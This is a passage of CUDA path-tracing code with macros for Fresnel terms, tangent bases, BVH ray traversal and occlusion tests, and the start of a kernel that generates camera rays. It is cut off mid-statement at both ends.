triangles[tri_index].vertex_tangents[1][2] + \ v * triangles[tri_index].vertex_tangents[2][2]; \ flip_binormal = w * triangles[tri_index].vertex_tangents[0][3] + \ u * triangles[tri_index].vertex_tangents[1][3] + \ v * triangles[tri_index].vertex_tangents[2][3]; \ } \ CROSS(N, T, B); \ if (flip_binormal < 0.0f) { \ B[0] = -B[0]; \ B[1] = -B[1]; \ B[2] = -B[2]; \ } \ } /// #define RELATIVE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = DOT(V, T); \ D[1] = DOT(V, B); \ D[2] = DOT(V, N); \ } /// #define ROTATE_TO_BASIS(V, N, T, B, D) \ {\ D[0] = V[0] * T[0] + V[1] * B[0] + V[2] * N[0]; \ D[1] = V[0] * T[1] + V[1] * B[1] + V[2] * N[1]; \ D[2] = V[0] * T[2] + V[1] * B[2] + V[2] * N[2]; \ } /// #define CONDUCTOR_FRESNEL(I, IOR, K, F) \ { \ float cos_theta_2 = I * I; \ float temp = (IOR * IOR + K * K) * cos_theta_2; \ float rp2 = (temp - (IOR * (2.0f * I)) + 1.0f) / \ (temp + (IOR * (2.0f * I)) + 1.0f); \ float tempf = IOR * IOR + K * K; \ float rs2 = (tempf - (IOR * (2.0f * I)) + cos_theta_2) / \ (tempf + (IOR * (2.0f * I)) + cos_theta_2); \ F = 0.5f * (rp2 + rs2); \ } /// #define DIELECTRIC_FRESNEL(I, IOR, COS_THETA_T, F) \ { \ float scale = (I > 0.0f) ? 
1.0f / IOR : IOR; \ float cos_theta_t2 = 1.0f - (1.0f - I * I) * (scale * scale); \ if (cos_theta_t2 < 0.0f) { \ COS_THETA_T = 0.0f; \ F = 1.0f; \ } else { \ float cos_theta_i = fabs(I); \ float _cos_theta_t = sqrt(cos_theta_t2); \ float rs = (cos_theta_i - IOR * _cos_theta_t) / \ (cos_theta_i + IOR * _cos_theta_t); \ float rp = (IOR * cos_theta_i - _cos_theta_t) / \ (IOR * cos_theta_i + _cos_theta_t); \ COS_THETA_T = (I > 0.0f) ? -_cos_theta_t : _cos_theta_t; \ F = 0.5f * (rs * rs + rp * rp); \ } \ } /// #define TRACE(USE_NODES_IMAGE, USE_TRIANGLES_IMAGE, PRIMARY_RAY) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(d[0]); \ id[1] = 1.0f / NOT_ZERO(d[1]); \ id[2] = 1.0f / NOT_ZERO(d[2]); \ ood[0] = o[0] * id[0]; \ ood[1] = o[1] * id[1]; \ ood[2] = o[2] * id[2]; \ int32_t h_tri_index = NO_TRI_HIT; \ int32_t h_material_type; \ float h_u, h_v; \ float h_t = FLT_MAX; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] 
= l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 2); \ } else { \ vertex[0] = triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - o[0]; \ c[1] = 
vertex[1] - o[1]; \ c[2] = vertex[2] - o[2]; \ r[0] = (d[1] * c[2]) - (d[2] * c[1]); \ r[1] = (d[2] * c[0]) - (d[0] * c[2]); \ r[2] = (d[0] * c[1]) - (d[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-d, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ h_u = u; \ h_v = v; \ if (emission > 0.0f) { \ h_material_type = STATE_EMISSIVE; \ } else { \ h_material_type = 
STATE_MATERIAL; \ } \ h_tri_index = ti; \ } \ } \ } \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ ray_state[RS_DIR_X] = d[0]; \ ray_state[RS_DIR_Y] = d[1]; \ ray_state[RS_DIR_Z] = d[2]; \ if (h_tri_index != NO_TRI_HIT) {\ ray_state[RS_STATE] = h_material_type; \ o[0] += d[0] * h_t; \ o[1] += d[1] * h_t; \ o[2] += d[2] * h_t; \ ray_state[RS_ORIGIN_X] = o[0]; \ ray_state[RS_ORIGIN_Y] = o[1]; \ ray_state[RS_ORIGIN_Z] = o[2]; \ ray_state[RS_U] = h_u; \ ray_state[RS_V] = h_v; \ ray_state[RS_HIT_DISTANCE] = h_t; \ ray_state[RS_TRI_INDEX] = h_tri_index; \ } else {\ ray_state[RS_STATE] = STATE_ENVIRONMENT; \ }\ } /// #define OCCLUSION(O, D, USE_NODES_IMAGE, USE_TRIANGLES_IMAGE) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(D[0]); \ id[1] = 1.0f / NOT_ZERO(D[1]); \ id[2] = 1.0f / NOT_ZERO(D[2]); \ ood[0] = O[0] * id[0]; \ ood[1] = O[1] * id[1]; \ ood[2] = O[2] * id[2]; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = 
nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] = l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); \ } else { \ vertex[0] = 
triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - O[0]; \ c[1] = vertex[1] - O[1]; \ c[2] = vertex[2] - O[2]; \ r[0] = (D[1] * c[2]) - (D[2] * c[1]); \ r[1] = (D[2] * c[0]) - (D[0] * c[2]); \ r[2] = (D[0] * c[1]) - (D[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-D, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ 
albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ node_offset = TREE_TRAIL_END; \ break; \ } \ } \ } \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ } /// __global__ void Primary(float* ray_state, Material* materials, int32_t use_nodes_image, cudaTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t emission_atlas, Camera camera, uint4 b_seeds, int32_t width, int32_t height, int32_t invert_y, int32_t sample) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float o[3], d[3]; float pixel_sample[2]; PRNG(global_id, b_seeds.x, pixel_sample[0]); PRNG(global_id, b_seeds.y, pixel_sample[1]); int32_t x_pixel = global_id % width; int32_t y_pixel = global_id / width; if (invert_y) { y_pixel = (height - 1) - y_pixel; } float p[3] = { camera.root_pixel[0] + ((x_pixel + pixel_sample[0]) * camera.pixel_offset[0]), camera.root_pixel[1] + ((y_pixel + 